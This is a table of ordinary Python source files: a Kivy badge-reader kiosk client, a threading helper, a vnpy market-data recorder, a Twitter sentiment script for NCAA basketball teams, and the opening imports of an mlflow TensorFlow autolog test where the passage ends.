source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
client.py | import time
import uuid
from threading import Thread
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.config import Config
from kivy.lang import Builder
from kivy.logger import Logger
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.button import Button
from kivy.uix.gridlayout import GridLayout
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.screenmanager import NoTransition, Screen, ScreenManager
from kivy.uix.textinput import TextInput
import _client.badge as badge
import _shared.data as data
import configparser
cparser = configparser.ConfigParser()
cparser.read(['default_config.ini', 'config.ini'])
def print(*text):
    """Shadow the builtin print, routing all output to the Kivy logger.

    Joins the positional arguments with spaces (like builtin print) and
    emits the line at DEBUG level, prefixed with this file's path.
    """
    # BUG FIX: the original did " ".join(str(text)), which joined the
    # *characters* of the tuple's repr; join the stringified items instead.
    Logger.debug(f'{__file__}: {" ".join(str(t) for t in text)}')
# Runtime initialisation: data layer, Kivy config/skin, and the global
# mutable session state shared by the screens below.
data.init('client')
Config.read(os.path.join(cparser.get('directories', 'client'), 'kivy.ini'))
style = Builder.load_file(os.path.join(cparser.get('directories', 'client'), 'style.kv'))
sm = ScreenManager(transition=NoTransition())
# QWERTZ on-screen keyboard layout, one comma-separated string per row.
# BUG FIX: the home row contained a duplicated 'd' ('a,s,d,f,d,g,...').
keys = [
    'q,w,e,r,t,z,u,i,o,p',
    'a,s,d,f,g,h,j,k,l',
    'y,x,c,v,b,n,m',
    '.,@,del,SPEICHERN'
]
focused = None              # DetailInput currently holding keyboard focus
times = {}                  # last-press timestamp per key text (debouncing)
badge_ = None               # badge id currently at the reader, or None
user = None                 # logged-in user object, or None
itemlayout = None           # ItemLayout singleton, set by its __init__
registration_fields = None
timeout = None              # pending auto-logout Clock event, or None
def renew_timeout():
    """Push the 30-second auto-logout window forward from now."""
    global timeout
    previous = timeout
    if previous is not None:
        Clock.unschedule(previous)
    timeout = Clock.schedule_once(logout, 30)
def login(b):
    """Log in the holder of badge `b`, redraw, and show the kiosk screen."""
    global user
    session_user = data.login_user(b)
    user = session_user
    refresh()
    sm.current = 'Kiosk'
def logout(*args):
    """Clear the session, blank the registration form, show the login screen.

    Accepts (and ignores) positional args so it can be a Clock callback.
    """
    global user, badge_
    user = None
    badge_ = None
    # Blank the registration inputs so the next badge starts fresh.
    for field_id in ('firstname', 'lastname', 'email'):
        RS.ids[field_id].text = ''
    Clock.schedule_once(RS.ids['firstname'].refocus, 0.1)
    sm.current = 'Login'
def refresh(content='all'):
    """Redraw kiosk widgets; `content` selects which part to update.

    One of 'balance', 'userinformation', 'products', or 'all' (default),
    which updates every part in turn.
    """
    if content == 'all':
        for part in ('balance', 'userinformation', 'products'):
            refresh(part)
        return
    if content == 'balance':
        KS.ids['balance'].text = str(user.balance) + ' CHF'
    elif content == 'userinformation':
        KS.ids['balance'].text = str(user.balance) + ' CHF'
        KS.ids['name'].text = user.firstname + '\n' + user.lastname
        KS.ids['avatar'].source = user.avatar
        KS.ids['otp'].text = 'OTP\n' + str(user.otp)
    elif content == 'products':
        itemlayout.refresh()
def on_badge(b):
    """Badge-reader callback: end stale sessions, then log in or register."""
    global badge_
    # A different badge than the current session's ends that session first.
    if b != badge_:
        logout()
    renew_timeout()
    badge_ = b
    if not data.user_exists(b):
        sm.current = 'Register'
        return
    login(b)
class Keyboard(BoxLayout):
    """On-screen QWERTZ keyboard built from the module-level `keys` rows.

    Key presses are debounced and typed into the currently focused
    DetailInput; the SPEICHERN key submits the registration form.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.orientation = 'vertical'
        # One horizontal BoxLayout of Buttons per row string in `keys`.
        for y in keys:
            row = BoxLayout()
            row.orientation = 'horizontal'
            for x in y.upper().split(','):
                row.add_widget(
                    Button(text=x, font_size=30, on_press=self.on_press))
            self.add_widget(row)

    def on_press(self, instance):
        """Handle a key button press: type, delete, or submit registration."""
        renew_timeout()
        global times, user, registration_fields
        # Button presses steal focus; give it back to the active input.
        if focused is not None:
            Clock.schedule_once(focused.refocus, 0.1)
        # Debounce: ignore repeats of the same key within 50 ms.
        if time.time() - times.get(instance.text, time.time() - 100) > .05:
            times.update({instance.text: time.time()})
            # NOTE(review): indentation was lost in extraction; this nesting
            # assumes the whole DEL/SPEICHERN chain requires a focused input.
            if focused is not None:
                if instance.text not in ('DEL', 'SPEICHERN'):
                    focused.insert_text(instance.text)
                elif instance.text == 'DEL':
                    focused.do_backspace()
                elif instance.text == 'SPEICHERN':
                    # Reject submission while any registration field is empty.
                    if '' in (RS.ids['firstname'].text, RS.ids['lastname'].text, RS.ids['email'].text):
                        b = BoxLayout()
                        b.orientation = 'vertical'
                        b.add_widget(
                            Label(text='Bitte alle Felder ausfüllen!'))
                        btn = Button(text='Ok')
                        b.add_widget(btn)
                        p = Popup()
                        p.title = 'Fehler'
                        p.content = b
                        btn.bind(on_press=p.dismiss)
                        p.open()
                        return
                    # Create user
                    user = data.register_user(
                        RS.ids['firstname'].text, RS.ids['lastname'].text, RS.ids['email'].text, badge_)
                    logout()
class LoginScreen(Screen):
    """Idle screen shown while waiting for a badge scan.

    All layout/behaviour comes from the .kv style file; the redundant
    pass-through __init__ override was removed.
    """
class KioskScreen(Screen):
    """Main purchase screen shown to a logged-in user."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    def logout(self):
        # Delegate to the module-level logout (clears the whole session).
        logout()

    # Fallback avatar path; available to the .kv bindings.
    blank = data.default_avatar

    def get_balance(self):
        """Return the current user's balance, or 'Error' when logged out."""
        if user is not None:
            return user.balance
        else:
            return 'Error'

    def get_avatar(self):
        """Return the current user's avatar path, or the default one."""
        if user is not None:
            return user.avatar
        else:
            return data.default_avatar
class RegisterScreen(Screen):
    """Form for creating a user for an unknown badge.

    Layout and input ids (firstname/lastname/email) come from the .kv
    file; the redundant pass-through __init__ override was removed.
    """
# Product buttons currently shown in the kiosk grid.
items = []


def enable_items(*args, **kwargs):
    """Re-enable every product button (used as a Clock callback)."""
    for widget in items:
        widget.disabled = False


def disable_items():
    """Grey out every product button while a purchase is in flight."""
    for widget in items:
        widget.disabled = True
class Item(Button):
    """A purchasable product button shown in the kiosk grid."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.prid = 0                # product id in the data layer
        self.name = ""               # display name
        self.stock = 0               # remaining stock
        self.price = 0               # unit price (CHF)
        self.id = uuid.uuid1().hex   # unique widget id

    def on_press(self):
        """Buy one unit for the logged-in user, then briefly lock the grid."""
        renew_timeout()
        disable_items()
        user.buy(self.prid)
        refresh('balance')
        # Debounce: keep all buttons disabled for 2 s to avoid double buys.
        Clock.schedule_once(enable_items, 2)
class ItemLayout(GridLayout):
    """Grid of Item buttons, rebuilt from the product catalogue."""

    def __init__(self, *args, **kwargs):
        global itemlayout
        super().__init__(*args, **kwargs)
        self.sm = sm
        self.refresh()
        # Register the singleton so the module-level refresh() can reach it.
        itemlayout = self

    def refresh(self):
        """Rebuild the product buttons from data.get_products()."""
        global items
        self.clear_widgets()
        items.clear()
        for product in data.get_products().items():
            b = Item()
            b.prid = product[0]
            b.name = product[1]['name']
            b.stock = product[1]['stock']
            b.price = product[1]['price']
            b.text = f'''{b.name}\n{b.price} CHF'''
            self.add_widget(b)
            items.append(b)
class DetailInput(TextInput):
    """TextInput that records itself as the on-screen keyboard's target."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    def _on_focus(self, instance, value):
        # Remember the focused input so Keyboard.on_press can type into it.
        global focused
        if value:
            focused = instance
        super()._on_focus(instance, value)

    def refocus(self, *args):
        # Clock-callback signature; restores focus lost to a button press.
        self.focus = True
# Build the screen graph, start the badge-reader thread, create the app.
LS = LoginScreen(name='Login')
KS = KioskScreen(name='Kiosk')
RS = RegisterScreen(name='Register')
sm.add_widget(LS)
sm.add_widget(KS)
sm.add_widget(RS)
sm.current = 'Login'


class KioskApp(App):
    def build(self):
        # The ScreenManager is the root widget of the application.
        return sm


badge.Logger = Logger
# Poll the badge sensor on a background thread; on_badge handles scans.
badgesensor = Thread(target=badge.run, args=[on_badge, ])
badgesensor.start()
app = KioskApp()
app.run() |
thread.py | from threading import Thread
import queue
class ThreadWithReturnValue(object):
    """Run `target` on a background thread and hand its result to join().

    The thread starts immediately. Extra keyword arguments (beyond
    `target` and `args`) are forwarded to the target call.
    """

    def __init__(self, target=None, args=(), **kwargs):
        self._que = queue.Queue()

        def _runner(q, call_args, call_kwargs):
            # BUG FIX: the original put nothing on the queue when `target`
            # raised, so join() blocked forever on an empty queue; store
            # the exception and re-raise it in join() instead.
            try:
                q.put((True, target(*call_args, **call_kwargs)))
            except BaseException as exc:
                q.put((False, exc))

        self._t = Thread(target=_runner, args=(self._que, args, kwargs))
        self._t.start()

    def join(self):
        """Block until the target finishes; return its result or re-raise."""
        self._t.join()
        ok, payload = self._que.get()
        if ok:
            return payload
        raise payload
|
engine.py | """"""
from threading import Thread
from queue import Queue, Empty
from copy import copy
from vnpy.event import Event, EventEngine
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.object import (
SubscribeRequest,
TickData,
BarData,
ContractData
)
from vnpy.trader.event import EVENT_TICK, EVENT_CONTRACT
from vnpy.trader.utility import load_json, save_json, BarGenerator
from vnpy.trader.database import database_manager
APP_NAME = "DataRecorder"
EVENT_RECORDER_LOG = "eRecorderLog"
EVENT_RECORDER_UPDATE = "eRecorderUpdate"
class RecorderEngine(BaseEngine):
    """Market-data recorder: saves subscribed tick/bar data to the database.

    Subscriptions are persisted in a JSON setting file and restored on
    startup. Incoming data is queued and written by a dedicated worker
    thread so database I/O never blocks the event loop.
    """

    setting_filename = "data_recorder_setting.json"

    def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
        """Load persisted subscriptions, wire up events, start the worker."""
        super().__init__(main_engine, event_engine, APP_NAME)

        self.queue = Queue()                   # pending ("tick"|"bar", data) tasks
        self.thread = Thread(target=self.run)  # database writer thread
        self.active = False                    # worker-loop run flag

        self.tick_recordings = {}              # vt_symbol -> contract info (tick)
        self.bar_recordings = {}               # vt_symbol -> contract info (bar)
        self.bar_generators = {}               # vt_symbol -> BarGenerator

        self.load_setting()
        self.register_event()
        self.start()
        self.put_event()

    def load_setting(self):
        """Restore tick/bar subscription dicts from the setting file."""
        setting = load_json(self.setting_filename)
        self.tick_recordings = setting.get("tick", {})
        self.bar_recordings = setting.get("bar", {})

    def save_setting(self):
        """Persist the current tick/bar subscription dicts."""
        setting = {
            "tick": self.tick_recordings,
            "bar": self.bar_recordings
        }
        save_json(self.setting_filename, setting)

    def run(self):
        """Worker loop: drain the task queue into the database."""
        while self.active:
            try:
                task = self.queue.get(timeout=1)
                task_type, data = task

                if task_type == "tick":
                    database_manager.save_tick_data([data])
                elif task_type == "bar":
                    database_manager.save_bar_data([data])
            except Empty:
                # The 1 s timeout lets the loop re-check self.active
                # so close() can shut the thread down promptly.
                continue

    def close(self):
        """Stop the worker thread and wait for it to exit."""
        self.active = False

        # BUG FIX: Thread.isAlive() was removed in Python 3.9;
        # is_alive() is the supported spelling.
        if self.thread.is_alive():
            self.thread.join()

    def start(self):
        """Mark the engine active and start the writer thread."""
        self.active = True
        self.thread.start()

    def add_bar_recording(self, vt_symbol: str):
        """Subscribe `vt_symbol` and start recording its bar (K-line) data."""
        if vt_symbol in self.bar_recordings:
            self.write_log(f"已在K线记录列表中:{vt_symbol}")
            return

        contract = self.main_engine.get_contract(vt_symbol)
        if not contract:
            self.write_log(f"找不到合约:{vt_symbol}")
            return

        self.bar_recordings[vt_symbol] = {
            "symbol": contract.symbol,
            "exchange": contract.exchange.value,
            "gateway_name": contract.gateway_name
        }

        self.subscribe(contract)
        self.save_setting()
        self.put_event()

        self.write_log(f"添加K线记录成功:{vt_symbol}")

    def add_tick_recording(self, vt_symbol: str):
        """Subscribe `vt_symbol` and start recording its tick data."""
        if vt_symbol in self.tick_recordings:
            self.write_log(f"已在Tick记录列表中:{vt_symbol}")
            return

        contract = self.main_engine.get_contract(vt_symbol)
        if not contract:
            self.write_log(f"找不到合约:{vt_symbol}")
            return

        self.tick_recordings[vt_symbol] = {
            "symbol": contract.symbol,
            "exchange": contract.exchange.value,
            "gateway_name": contract.gateway_name
        }

        self.subscribe(contract)
        self.save_setting()
        self.put_event()

        self.write_log(f"添加Tick记录成功:{vt_symbol}")

    def remove_bar_recording(self, vt_symbol: str):
        """Stop recording bar data for `vt_symbol`."""
        if vt_symbol not in self.bar_recordings:
            self.write_log(f"不在K线记录列表中:{vt_symbol}")
            return

        self.bar_recordings.pop(vt_symbol)
        self.save_setting()
        self.put_event()

        self.write_log(f"移除K线记录成功:{vt_symbol}")

    def remove_tick_recording(self, vt_symbol: str):
        """Stop recording tick data for `vt_symbol`."""
        if vt_symbol not in self.tick_recordings:
            self.write_log(f"不在Tick记录列表中:{vt_symbol}")
            return

        self.tick_recordings.pop(vt_symbol)
        self.save_setting()
        self.put_event()

        self.write_log(f"移除Tick记录成功:{vt_symbol}")

    def register_event(self):
        """Listen for tick updates and newly available contracts."""
        self.event_engine.register(EVENT_TICK, self.process_tick_event)
        self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)

    def process_tick_event(self, event: Event):
        """Route a tick to the tick recorder and/or its bar generator."""
        tick = event.data

        if tick.vt_symbol in self.tick_recordings:
            self.record_tick(tick)

        if tick.vt_symbol in self.bar_recordings:
            bg = self.get_bar_generator(tick.vt_symbol)
            bg.update_tick(tick)

    def process_contract_event(self, event: Event):
        """Re-subscribe recorded symbols once their contract is known."""
        contract = event.data
        vt_symbol = contract.vt_symbol

        if vt_symbol in self.tick_recordings or vt_symbol in self.bar_recordings:
            self.subscribe(contract)

    def write_log(self, msg: str):
        """Emit a log message on the recorder log event channel."""
        event = Event(
            EVENT_RECORDER_LOG,
            msg
        )
        self.event_engine.put(event)

    def put_event(self):
        """Publish the (sorted) tick/bar subscription lists to the UI."""
        tick_symbols = list(self.tick_recordings.keys())
        tick_symbols.sort()

        bar_symbols = list(self.bar_recordings.keys())
        bar_symbols.sort()

        data = {
            "tick": tick_symbols,
            "bar": bar_symbols
        }

        event = Event(
            EVENT_RECORDER_UPDATE,
            data
        )
        self.event_engine.put(event)

    def record_tick(self, tick: TickData):
        """Queue a copy of `tick` for the writer thread."""
        task = ("tick", copy(tick))
        self.queue.put(task)

    def record_bar(self, bar: BarData):
        """Queue a copy of `bar` for the writer thread (BarGenerator callback)."""
        task = ("bar", copy(bar))
        self.queue.put(task)

    def get_bar_generator(self, vt_symbol: str):
        """Return (creating on demand) the BarGenerator for `vt_symbol`."""
        bg = self.bar_generators.get(vt_symbol, None)

        if not bg:
            bg = BarGenerator(self.record_bar)
            self.bar_generators[vt_symbol] = bg

        return bg

    def subscribe(self, contract: ContractData):
        """Request market data for `contract` from its gateway."""
        req = SubscribeRequest(
            symbol=contract.symbol,
            exchange=contract.exchange
        )
        self.main_engine.subscribe(req, contract.gateway_name)
|
NCAA.py | def installations():
import os
os.system("pip install nltk")
import nltk
nltk.download('punkt')
nltk.download('vader_lexicon')
import os
os.system("pip install requests")
os.system("pip install requests")
os.system("pip install requests_oauthlib")
installations()
from requests_oauthlib import OAuth1Session
import requests
from datetime import datetime
import time
import re
import json
import textwrap
import nltk
from nltk.sentiment import SentimentIntensityAnalyzer
from nltk import word_tokenize,sent_tokenize
import requests
from requests_oauthlib import OAuth1Session
import textwrap
from deephaven.DateTimeUtils import convertDateTime, minus, convertPeriod, currentTime, plus
from deephaven import DynamicTableWriter
import deephaven.Types as dht
import threading
from deephaven.TableTools import newTable, stringCol
from deephaven import Aggregation as agg, as_list
from deephaven.conversion_utils import NULL_INT
from deephaven.TableTools import newTable, intCol, stringCol
# --- Twitter search configuration --------------------------------------
bearer_token = '<YOUR BEARER TOKEN>'
# Max results per time bin, 10-100
max_results = 100
# Number of hourly time bins used for the historical backfill
time_bins = 15
# seconds between live-polling requests
time_to_sleep = 60
# how long to keep listening, in minutes
time_alive = 10
# How many days to go back. Max 7 for non-academic searches
time_history = 1
# Highest tweet id seen so far; used as since_id when polling live tweets
max_id = int(1502096953148444672)
# Filled below: <=512-char chunks of OR-joined team handles
search_terms = []
# Twitter handles of NCAA men's basketball team accounts (search targets).
# NOTE(review): 'wku basketball' contains a space — possibly a typo for an
# underscore-style handle; confirm against the actual account name.
teams =['acu_mbb', 'af_mbb', 'zipsmbb', 'alabamambb', 'bulldogs_hoops', 'bamastatembb', 'ualbanymbb', 'bravessports', 'au_mbasketball', 'appstatembb', 'aplayersprogram', 'sundevilhoops', 'razorbackmbb', 'astatemb', 'uapblionsroar', 'armywp_mbb', 'auburnmbb', 'austinpeaymbb', 'ballstatembb', 'baylormbb', 'buknightsmbb', 'belmontmbb', 'bcuhoops', 'binghamtonmbb', 'broncosportsmbb', 'bcmbb', 'terriermbb', 'bgsumhoops', 'bradleyumbb', 'brownbasketball', 'bryanthoops', 'bucknell_mbb', 'ubmenshoops', 'butlermbb', 'byubasketball', 'calpolymbb', 'csub_mbb', 'fullertonmbb', 'csunmbb', 'calmbball', 'cbumbb', 'gocamelsmbb', 'griffs_mbb', 'ucambb', 'ccsu_mbb', 'ucf_mbb', 'cmumensbball', 'cofcbasketball', 'csu_mbball', 'charlottembb', 'gomocsmbb', 'chicagostatembb', 'gobearcatsmbb', 'clemsonmbb', 'csu_basketball', 'coastalmbb', 'colgatembb', 'cubuffsmbb', 'csumbasketball', 'culionsmbb', 'uconnmbb', 'coppinmbb', 'cubigredhoops', 'bluejaymbb', 'dartmouthmbk', 'davidsonmbb', 'daytonmbb', 'delawarembb', 'dsumbb', 'du_mhoops', 'depaulhoops', 'detroitmbb', 'dixiestatebball', 'drakebulldogsmb', 'drexelmbb', 'dukembb', 'duqmbb', 'ecubasketball', 'etsu_mbb', 'eiubasketball', 'ekuhoops', 'emuhoops', 'ewumbb', 'elonmbasketball', 'ueathletics_mbb', 'stagsmensbball', 'fdu_mbb', 'gatorsmbk', 'famuathletics', 'fau_hoops', 'fgcu_mbb', 'fiuhoops', 'fsuhoops', 'fordhammbb', 'fresnostatembb', 'furmanhoops', 'gwu_mbk', 'masonmbb', 'gw_mbb', 'georgetownhoops', 'ugabasketball', 'gsathletics_mbb', 'georgiastatembb', 'gtmbb', 'zagmbb', 'gsu_tigers', 'gcu_mbb', 'gbphoenixmbb', 'hampton_mbb', 'hartfordmbb', 'harvardmbb', 'hawaiimbb', 'hpumbb', 'hofstrambb', 'hcrossmbb', 'uhcougarmbk', 'hbubasketball', 'humensbb', 'vandalhoops', 'idahostatebball', 'illinimbb', 'redbird_mbb', 'uicflamesmbb', 'uiwmbb', 'indianambb', 'indstmbb', 'ionagaelsmbb', 'iowahoops', 'cyclonembb', 'iupuimensbball', 'gojsutigersmbb', 'jax_mbb', 'jsu_mbb', 'jmumbasketball', 'kuhoops', 'kstatembb', 'ksuowlsmbb', 'kentstmbb', 
'kentuckymbb', 'lasallembb', 'lafayettembb', 'lamarmbb', 'lehighmbb', 'libertymbb', 'lipscombmbb', 'littlerockmbb', 'lbsuhoops', 'liubasketball', 'longwoodmbb', 'ragincajunsmbb', 'latechhoops', 'ulm_mbb', 'louisvillembb', 'lmulionsmbb', 'ramblersmbb', 'loyolambb', 'lsubasketball', 'blackbearsmbb', 'jaspersmbb', 'maristmbb', 'marquettembb', 'herdmbb', 'terrapinhoops', 'eshawkshoops', 'umassbasketball', 'mcneesembb', 'memphis_mbb', 'mercermbb', 'merrimackmbb', 'caneshoops', 'miamioh_bball', 'umichbball', 'msu_basketball', 'mt_mbb', 'mke_mbb', 'gophermbb', 'hailstatembk', 'mvsudevilsports', 'mizzouhoops', 'msubearshoops', 'monmouthbball', 'montanagrizbb', 'msubobcatsmbb', 'msueaglesmbb', 'morganstbears', 'mounthoops', 'racershoops', 'navybasketball', 'huskerhoops', 'omahambb', 'nevadahoops', 'unhmbb', 'unmlobombb', 'nmstatembb', 'privateersmbb', 'niagarambb', 'nicholls_mbb', 'njithoops', 'nsu_bball', 'una_mbb', 'unc_basketball', 'ncatbasketball', 'nccu_mbb', 'packmensbball', 'undmbasketball', 'ndsumbb', 'ospreysmbb', 'meangreenmbb', 'gonumbasketball', 'naubasketball', 'unc_bears', 'gohuskiesmbb', 'unimbb', 'nkunorsembb', 'numensbball', 'nsudemonsmbb', 'ndmbb', 'oaklandmbb', 'ohiombasketball', 'ohiostatehoops', 'ou_mbball', 'osumbb', 'odumbb', 'olemissmbb', 'orumbb', 'oregonmbb', 'beavermbb', 'pacificmensbb', 'pennbasketball', 'pennstatembb', 'peppbasketball', 'pitt_mbb', 'pilothoops', 'psuviksmbb', 'pvamupanthers', 'bluehosehoops', 'princeton_hoops', 'pcfriarsmbb', 'boilerball', 'mastodonmbb', 'qu_mbb', 'radfordmbb', 'rhodymbb', 'ricebasketball', 'spidermbb', 'ridermbb', 'rmumbasketball', 'rutgersmbb', 'sachornetsmbb', 'shu_menshoops', 'sjuhawks_mbb', 'saintlouismbb', 'saintmaryshoops', 'peacocksmbb', 'bearkatsmbb', 'samfordmbb', 'usdmbb', 'aztec_mbb', 'usfdonsmbb', 'sjsumbb', 'santaclarahoops', 'seattleumbb', 'setonhallmbb', 'sienambb', 'siuembb', 'smubasketball', 'wearesouth_mbb', 'gamecockmbb', 'scstateathletic', 'upstatemb', 'sdcoyotesmbb', 'gojacksmbb', 'usfmbb', 
'semombb', 'slu_hoops', 'jaguarhoops', 'siu_basketball', 'southernmissmbb', 'suubasketball', 'bonniesmbb', 'sfbkmbb', 'redflashmbb', 'stjohnsbball', 'stanfordmbb', 'sfa_mbb', 'stetsonmbb', 'stonybrookmbb', 'cuse_mbb', 'tarletonmbb', 'tcubasketball', 'tumbbhoops', 'vol_hoops', 'tsutigersmbb', 'ttu_basketball', 'skyhawkhoops', 'texasmbb', 'aggiembk', 'islandersmbb', 'tsumenshoops', 'txstatembb', 'texastechmbb', 'uta_mbb', 'citadelhoops', 'toledombb', 'towson_mbb', 'troytrojansmbb', 'greenwavembb', 'tumbasketball', 'uab_mbb', 'ucdavismbb', 'ucimbb', 'ucrmbb', 'ucsdmbb', 'ucsbbasketball', 'uclambb', 'riverhawkmbb', 'umbc_mbb', 'kcroosmbb', 'uncavlmbb', 'uncgbasketball', 'uncwmenshoops', 'therunninrebels', 'usc_hoops', 'utahmbb', 'usubasketball', 'uvumbb', 'utep_mbb', 'utrgvmbb', 'utsambb', 'valpobasketball', 'vandymbb', 'uvmmbb', 'novambb', 'uvamenshoops', 'vcu_hoops', 'vmi_basketball', 'hokiesmbb', 'wagner_mbb', 'wakembb', 'uw_mbb', 'wsumenshoops', 'weberstatembb', 'wvuhoops', 'wcu_mbb', 'wiumenshoops', 'wku basketball', 'wmumbb', 'goshockersmbb', 'wmtribembb', 'winthrop_mbb', 'badgermbb', 'woffordmbb', 'wsu_mbb', 'wyo_mbb', 'xaviermbb', 'yale_basketball', 'ysumenshoops']
# Build <=512-character query chunks of OR-joined team handles, because the
# Twitter search endpoint limits query length.
search_string = ' OR '.join(teams)
wrapper = textwrap.TextWrapper(width=512)
temp_terms = wrapper.wrap(text=search_string)
for element in temp_terms:
    # Wrapping can leave a dangling OR token at either end of a chunk;
    # strip it so every chunk is a syntactically valid query.
    # BUG FIX: the original compared element[-2:] against the 3-character
    # string 'OR ' (always False) and so never stripped trailing ORs.
    if element.startswith('OR '):
        element = element[3:]
    if element.endswith(' OR'):
        element = element[:-3]
    search_terms.append(element.strip())
def make_table():
    """Build a one-column Deephaven table of all team handles.

    NOTE(review): this name is redefined by make_table(term) further down;
    rename one of the two to avoid the shadowing.
    """
    return newTable(stringCol("team", teams))


teams_table = make_table()
# twitter function to create header
def create_headers(bearer_token):
    """Build the HTTP headers for Twitter API v2 requests."""
    return {
        "Authorization": f"Bearer {bearer_token}",
        "User-Agent": "v2FullArchiveSearchPython",
    }
# twitter url for recent tweets
search_url = "https://api.twitter.com/2/tweets/search/recent"


# connect to twitter with above header
def connect_to_endpoint(url, headers, params):
    """GET `url` with the given headers/params and return the JSON body.

    Raises Exception on any non-200 response. On a 429 (rate limit) it
    sleeps two minutes before raising so the caller retries after backoff.
    """
    # BUG FIX: the original ignored the `url` parameter (always hitting
    # search_url), had a 429 branch that was unreachable after the generic
    # non-200 raise, and slept 120 s on *every successful* call.
    response = requests.request("GET", url, headers=headers, params=params)
    if response.status_code == 429:
        time.sleep(120)
        raise Exception(response.status_code, response.text)
    if response.status_code != 200:
        raise Exception(response.status_code, response.text)
    return response.json()
# get tweets, if not enough data return null
def get_tweets(query_params):
    """Fetch tweets for `query_params`; return ' ' when data is missing or sparse."""
    headers = create_headers(bearer_token)
    json_response = connect_to_endpoint(search_url, headers, query_params)
    try:
        tweets = json_response['data']
    except KeyError:
        print("KeyError in data")
        return " "
    if len(tweets) > 2:
        return tweets
    return " "
def build_default_sia_classifier_func(classifier):
    """Wrap a VADER-style classifier into text -> [pos, neu, neg, compound]."""
    def score(text):
        polarity = classifier.polarity_scores(text)
        return [polarity["pos"], polarity["neu"], polarity["neg"], polarity["compound"]]
    return score
# Module-level sentiment scorer: text -> [pos, neu, neg, compound].
classifier = build_default_sia_classifier_func(SentimentIntensityAnalyzer())


# twitter parameters for tweets from earlier in the day
def get_query_params_hist(search_term, start_time, end_time):
    """Query params for a historical search window [start_time, end_time)."""
    return {'query': search_term,
            'start_time': start_time,
            'end_time': end_time,
            'max_results': max_results,
            'tweet.fields': 'id,text,author_id,in_reply_to_user_id,geo,conversation_id,created_at,lang,public_metrics,referenced_tweets,reply_settings,source',
            'user.fields': 'id,name,username,created_at,description,public_metrics,verified',
            'next_token': {}}


# twitter parameters for live tweets
def get_query_params_live(search_term, max_id):
    """Query params for tweets newer than `max_id` (since_id polling)."""
    return {'query': search_term,
            'since_id': max_id,
            'max_results': max_results,
            'tweet.fields': 'id,text,author_id,in_reply_to_user_id,geo,conversation_id,created_at,lang,public_metrics,referenced_tweets,reply_settings,source',
            'user.fields': 'id,name,username,created_at,description,public_metrics,verified',
            'next_token': {}}
def write_data(all_text, tableWriter):
    """Append tweets to the Deephaven table; return the highest tweet id seen."""
    for t in all_text:
        try:
            id = float(t['id'])  # NOTE(review): unused local; kept as-is
            if max_id < float(t['id']):
                # Update the module-level high-water mark used for since_id polling.
                globals()['max_id'] = int(t['id'])
            # created_at is ISO-8601 with a trailing 'Z'; re-tagged as " NY" for
            # convertDateTime — assumes Deephaven accepts this format; confirm.
            dateTime = t['created_at'][:-1]+" NY"
            retweet_count = t['public_metrics']['retweet_count']
            reply_count = t['public_metrics']['reply_count']
            like_count = t['public_metrics']['like_count']
            quote_count = t['public_metrics']['quote_count']
            tableWriter.logRowPermissive(t['text'].lower(), convertDateTime(dateTime), int(retweet_count), int(reply_count), int(like_count), int(quote_count), t['id'])
        except TypeError:
            # get_tweets() returns the string " " when there is no data;
            # iterating it yields characters, and t['id'] raises TypeError.
            print("string indices must be integers")
    return max_id
def thread_func(search_terms, tableWriter):
    """Backfill today's tweets per hourly bin, then poll for live tweets."""
    global max_id
    # Historical pass: one request per (hour bin, query chunk) for today.
    for i in range(1, time_bins):
        for search_term in search_terms:
            start_time = str(plus(convertDateTime(str(currentTime())[:11]+'00:00:00.000 NY'),convertPeriod("T"+str(int(i-1))+"H")))[:-9]+'Z'
            end_time = str(plus(convertDateTime(str(currentTime())[:11]+'00:00:00.000 NY'),convertPeriod("T"+str(int(i))+"H")))[:-9]+'Z'
            query_params = get_query_params_hist(search_term, start_time, end_time)
            all_text = get_tweets(query_params)
            max_id = write_data(all_text, tableWriter)
    # Live pass: poll for tweets newer than max_id, sleeping between rounds.
    # NOTE(review): the round count is time_alive*time_to_sleep (= 600), each
    # round sleeping time_to_sleep seconds — confirm the intended total runtime.
    for i in range(time_alive*time_to_sleep):
        for search_term in search_terms:
            query_params = get_query_params_live(search_term, max_id)
            all_text = get_tweets(query_params)
            max_id = write_data(all_text, tableWriter)
        time.sleep(time_to_sleep)
def make_table(term):
    """Start a collector thread for `term` and return its live table.

    NOTE(review): this redefines the zero-argument make_table() declared
    above; rename one of the two to avoid the shadowing.
    """
    tableWriter = DynamicTableWriter(
        ["Text", "DateTime", "Retweet_count", "Reply_count", "Like_count", "Quote_count", "Id"],
        [dht.string, dht.datetime, dht.int_, dht.int_, dht.int_, dht.int_, dht.string])
    thread = threading.Thread(target=thread_func, args=[term, tableWriter])
    thread.start()
    return tableWriter.getTable()
# Live tweet table enriched with VADER sentiment columns, newest first.
data_sia = make_table(search_terms).update("Sentiment = (org.jpy.PyListWrapper)classifier(Text)",
    "Positive = (double)Sentiment[0]",
    "Neutral = (double)Sentiment[1]",
    "Negative = (double)Sentiment[2]",
    "Compound = (double)Sentiment[3]").sortDescending("DateTime")
def match_text(text):
    """Return every team handle that occurs as a substring of `text`."""
    return [handle for handle in teams if handle in text]
# Tag each tweet with the first matching team handle, then aggregate average
# sentiment and retweet counts per team.
tweet_matching = data_sia.update("team = (org.jpy.PyListWrapper)match_text(Text)").where("(team).size()>0").update("team =(String)team[0]")
teams_table_sia = teams_table.join(tweet_matching,"team=team", "Positive, Negative,Compound,Retweet_count")\
    .sort("team")\
    .aggBy(as_list([agg.AggAvg("Avg_Pos= Positive"),agg.AggAvg("Avg_Neg= Negative"),agg.AggAvg("Avg_Compound= Compound"),agg.AggAvg("Avg_retweet= Retweet_count"),agg.AggCount("Number_tweets")]), "team")
|
test_tensorflow2_autolog.py | # pep8: disable=E501
import collections
import pytest
import sys
import pickle
from packaging.version import Version
import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow.keras import layers
import mlflow
import mlflow.tensorflow
from mlflow.tensorflow._autolog import _TensorBoard, __MLflowTfKeras2Callback
